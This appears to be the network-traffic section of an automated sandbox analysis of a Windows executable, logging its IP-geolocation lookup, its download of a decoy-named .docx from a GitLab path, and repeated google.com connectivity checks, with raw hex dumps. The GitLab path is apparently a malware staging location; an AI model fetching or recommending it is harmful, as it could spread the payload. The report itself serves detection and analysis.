                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.749885208.95.112.1805472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.860852003 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.323766947 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:40 GMT
                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 306
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 22
                                                                                                                                                                                                                            X-Rl: 39
                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.749701172.65.251.784435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC107OUTGET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1
                                                                                                                                                                                                                            Host: gitlab.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            Content-Length: 16036
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            CF-Ray: 901d653f4e1a7ca6-EWR
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Age: 7
                                                                                                                                                                                                                            Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                            Content-Disposition: attachment; filename="Your_Benefits_and_Role.docx"; filename*=UTF-8''Your_Benefits_and_Role.docx
                                                                                                                                                                                                                            ETag: "c9f854e67f415052529ad6dc8e14658c"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                            Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC504INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 55 79 4a 55 61 31 66 30 68 48 53 36 4c 77 4e 58 63 67 55 4f 32 4c 71 73 73 79 53 61 54 76 47 51 45 55 71 44 33 6e 4c 4e 53 65 46 25 32 46 46 6c 47 35 42 78 76 71 62 6f 53 75 7a 58 69 5a 43 48 25 32 46 6b 53 39 47 48 62 6e 4d 79 32 6a 54 53 43 48 4b 6c 53 64 30 25 32 42 34 62 5a 78 69 38 50 4d 71 47 46 42 51 6e 34 45 47 7a 7a 39 33 68 6c 68 37 39 25 32 42 6e 59 33 25 32 46 42 46 33 34 47 73 6c 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyJUa1f0hHS6LwNXcgUO2LqssySaTvGQEUqD3nLNSeF%2FFlG5BxvqboSuzXiZCH%2FkS9GHbnMy2jTSCHKlSd0%2B4bZxi8PMqGFBQn4EGzz93hlh79%2BnY3%2FBF34Gslo%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC933INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 32 91 6f 57 66 01 00 00 a5 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: PK!2oWf[Content_Types].xml (
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: 06 00 08 00 00 00 21 00 1e 91 1a b7 ef 00 00 00 4e 02 00 00 0b 00 08 02 5f 72 65 6c 73 2f 2e 72 65 6c 73 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: !N_rels/.rels (
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: 96 a2 cc b7 d2 f8 d7 49 7b b7 75 af 8f 48 74 8e 90 55 1b e7 ae c3 28 be 6e 32 f7 31 cd c1 eb a6 e1 f0 dd 22 13 92 ce 12 98 11 98 1a 01 6b 21 7a 05 f0 7f 50 3a 3c e8 53 f6 a4 db 71 ad f1 24 2a 09 7a ad d6 2d f0 b4 99 88 56 78 cc a1 c3 19 e6 54 d2 77 a0 e6 6e 10 04 8e e1 fb 2d dd 0a 51 4e 61 ab 31 f0 8d 41 df 1f 41 eb 10 38 61 74 07 4d c6 c0 70 ad ae bd 69 9a ca 17 1a 7d 36 a7 65 a2 0e 7b a6 3b 4d 7a 16 53 89 07 59 1d 8a 3f e0 b6 25 85 b0 e2 38 ad 4e d5 e2 15 fb 6d 9d fa ee ce 76 f0 8b 53 d9 11 3b d3 a2 66 5e 51 8b 6c fe 90 c7 a1 ba 9d 8a 82 63 c4 19 62 ab aa fa 1a 3d f6 c8 07 a1 b6 0c 8b 9c 86 b0 b8 b9 64 05 93 4b d6 ba 25 df e5 a9 3e 5f 70 45 93 6f fd f0 db f7 c0 8e 98 02 15 27 ef 69 46 17 4c 92 ab 3b 96 0a c5 de 7c db 27 cf 64 7d 79 06 fd b9 63 b9 90 aa
                                                                                                                                                                                                                            Data Ascii: I{uHtU(n21"k!zP:<Sq$*z-VxTwn-QNa1AA8atMpi}6e{;MzSY?%8NmvS;f^Qlcb=dK%>_pEo'iFL;|'d}yc
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: 03 3c d6 52 7b a7 58 ea 18 cc 0f c8 85 fc 7b 01 06 b8 90 0c d3 43 b2 f9 5e 8c df d8 d2 b4 c4 ef 69 9a 61 b4 21 22 d4 85 ec 51 94 f2 8c 6b 16 a2 49 be 40 ae 5a 11 8d 39 67 49 d4 8c 5d f4 26 7e 7f 3c 38 7b 4c 3c 0b b4 23 85 94 1d 38 7f 97 ac 18 95 3a 9b 62 4f 39 93 58 e7 d2 38 6f 1c 62 bb 62 1a 56 7d 23 74 51 e8 dc 54 70 a5 48 58 13 38 5d 27 b0 ec f1 c4 7d 85 70 26 00 e4 1d cb 80 b6 b2 68 0a b8 8c 25 a3 0f 5a 32 44 9b 3d 50 f7 e9 1a a8 a5 2e 19 6d 1a 58 b6 e4 52 64 da fa 9b 60 da 75 2d db ea 99 17 5f 98 3d 49 45 7d c6 72 f2 90 89 c7 84 01 6f 41 05 ad 8b dc 3b b1 fa 4a d7 b5 ef 83 f7 f0 5f 55 ef 7e 5f d5 bb 03 c8 45 92 ad af 68 94 e2 9b fe c8 30 26 ee c5 e7 69 27 a1 79 0f 81 56 7f 82 ae ea 4c 80 54 f1 00 f1 b8 a2 39 c8 13 69 b5 31 19 93 f9 94 3e 00 e5 a1 8a
                                                                                                                                                                                                                            Data Ascii: <R{X{C^ia!"QkI@Z9gI]&~<8{L<#8:bO9X8obbV}#tQTpHX8]'}p&h%Z2D=P.mXRd`u-_=IE}roA;J_U~_Eh0&i'yVLT9i1>
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: db 08 8b a8 08 34 2a 9c 02 1c f5 5c 7d 16 b3 de ec 75 89 2e 6c 7c 21 38 5b 73 10 cb 98 10 14 66 f1 02 70 94 bf 66 36 c7 f0 1c 93 a1 b1 86 0a 59 aa 09 c7 d9 9a 83 78 8a 09 f1 85 e5 fb 9f 93 9c 98 27 10 7e f5 db f2 1f 00 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b6 f4 67 98 d2 06 00 00 c9 20 00 00 15 00 00 00 77 6f 72 64 2f 74 68 65 6d 65 2f 74 68 65 6d 65 31 2e 78 6d 6c ec 59 4b 8b 1b 47 10 be 07 f2 1f 86 b9 cb 7a cd e8 61 ac 35 d2 48 f2 6b d7 36 de b5 83 8f bd 52 6b a6 ad 9e 69 d1 dd da b5 30 86 60 9f 72 09 04 9c 90 43 0c b9 e5 10 42 0c 31 c4 e4 92 1f 63 b0 49 9c 1f 91 ea 1e 49 33 2d f5 c4 8f 5d 83 09 bb 82 55 3f be aa fe ba aa ba ba 34 73 e1 e2 fd 98 3a 47 98 0b c2 92 8e 5b 3d 57 71 1d 9c 8c d8 98 24 61 c7 bd 7d 30 2c b5 5c 47 48 94 8c
                                                                                                                                                                                                                            Data Ascii: 4*\}u.l|!8[sfpf6Yx'~PK!g word/theme/theme1.xmlYKGza5Hk6Rki0`rCB1cII3-]U?4s:G[=Wq$a}0,\GH
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: 20 f5 48 dc f7 52 46 10 6e 10 d2 63 e5 a7 54 7e e5 dd 53 f7 74 91 31 cd 6d d7 2c db 6b 2b ae a7 e3 69 83 44 2e dc 4c 12 b9 30 8c e0 f2 d8 1c 3e 65 5f b7 33 97 1a f4 94 29 b6 69 34 5b 1f c3 d7 2a 89 6c e4 06 9a 98 3d e7 18 ce 5c dd 07 35 23 34 eb b8 13 f8 c9 04 cd 78 06 fa 84 ca 54 88 86 49 c7 1d c9 a5 a1 3f 24 b3 cc b8 90 7d 24 a2 14 a6 a7 d2 fd c7 44 62 ee 50 12 43 ac e7 dd 40 93 8c 5b b5 d6 54 7b fc 44 c9 b5 2b 9f 9e e5 f4 57 de c9 78 32 c1 23 59 30 92 75 61 2e 55 62 9d 3d 21 58 75 d8 1c 48 ef 47 e3 63 e7 90 ce f9 2d 04 86 f2 9b 55 65 c0 31 11 72 6d cd 31 e1 b9 e0 ce ac b8 91 ae 96 47 d1 78 df 92 1d 51 44 67 11 5a de 28 f9 64 9e c2 75 7b 4d 27 b7 0f cd 74 73 57 66 7f b9 99 c3 50 39 e9 c4 b7 ee db 85 d4 44 2e 69 16 5c 20 ea d6 b4 e7 8f 8f 77 c9 e7 58 65
                                                                                                                                                                                                                            Data Ascii: HRFncT~St1m,k+iD.L0>e_3)i4[*l=\5#4xTI?$}$DbPC@[T{D+Wx2#Y0ua.Ub=!XuHGc-Ue1rm1GxQDgZ(du{M'tsWfP9D.i\ wXe
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: 9a 17 9f b6 d2 e6 a9 4b cf 2e d5 70 f8 f6 d2 df a3 ae 15 62 de ff b2 6a 8b 8c ca 95 29 10 bc 44 55 d5 d4 59 b6 09 26 1e 25 9b 52 07 a6 34 34 bc 15 f0 0d 68 5f b2 4d d8 62 a1 c5 c2 06 b3 2f 28 37 3b 03 ed 76 d1 c9 42 27 3b d2 8b 9c 2c ea 64 b1 93 c5 9d 2c 71 b2 a4 93 0d 9d 6c 68 64 25 74 16 49 09 7f 84 92 77 4b 23 5f 0b 4a c5 0e 17 b7 1d fe 42 d4 24 41 95 a8 c2 f3 66 1a 41 79 89 46 d0 8e 27 d5 db a6 f8 09 e6 16 2e 88 86 4f eb 8a 14 0c 3d 99 31 16 0e 8d 79 ab 0d 13 45 d4 fa 44 d7 60 46 b9 3a 65 30 83 be bd e4 fe 89 b1 2d f1 6f 62 31 53 32 27 50 8e ab 3d cb ba a1 f3 47 13 38 25 0a 1a 44 05 f3 49 0b 79 8a 05 71 5a 88 fc ce 0c e7 b8 91 27 71 18 5f 8f c6 b3 06 4e ec 5c d3 b6 87 c0 b9 7f c6 eb 29 52 b8 68 31 67 9a 34 a6 5f e3 69 12 8d 82 70 d4 bf 09 a2 69 3f 8e
                                                                                                                                                                                                                            Data Ascii: K.pbj)DUY&%R44h_Mb/(7;vB';,d,qlhd%tIwK#_JB$AfAyF'.O=1yED`F:e0-ob1S2'P=G8%DIyqZ'q_N\)Rh1g4_ipi?
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC1369INData Raw: b8 c8 5d ba 55 44 03 3e f9 70 1f 66 b6 b1 5c 8a ae 11 43 00 20 04 20 04 20 a4 83 ad 00 21 00 21 c2 52 80 10 80 10 80 10 80 10 80 10 80 90 cf 08 21 ec 48 d0 1b 42 0c cb 71 91 b1 78 a8 22 ea 0f 21 96 63 ce cc 07 04 10 02 10 02 10 32 cc 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 7f f5 86 10 53 5f d8 aa 3b 9f 57 11 f5 87 90 e5 72 a1 2c dd b9 2e ba 46 0c 01 80 10 80 10 80 90 0e b6 02 84 00 84 08 4b 01 42 00 42 00 42 00 42 00 42 00 42 3e 23 84 b0 c5 b6 3f 84 58 1a 52 94 85 53 45 d4 1f 42 e6 68 b1 b4 10 32 45 d7 88 21 00 10 02 10 02 10 d2 c1 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 32 f4 87 10 db b4 35 07 59 55 44 fd 21 64 36 77 6d 57 59 ea a2 6b c4 10 00 08 01 08 01 08 e9 60 2b 40 08 40 88 b0 14 20 04 20 04
                                                                                                                                                                                                                            Data Ascii: ]UD>pf\C !!R!HBqx"!c2Va)@@@@@@gS_;Wr,.FKBBBBBB>#?XRSEBh2E!Va)@@@@@@g25YUD!d6wmWYk`+@@


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.749711172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-hW5VRnhu9W0Jk0e54XQcWA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.749705172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-IlCQHf1VG5lkTh_AJ6tuMg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.749710172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-lMgSiBrdlWSZYxHTNt3B7g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            4192.168.2.749706172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
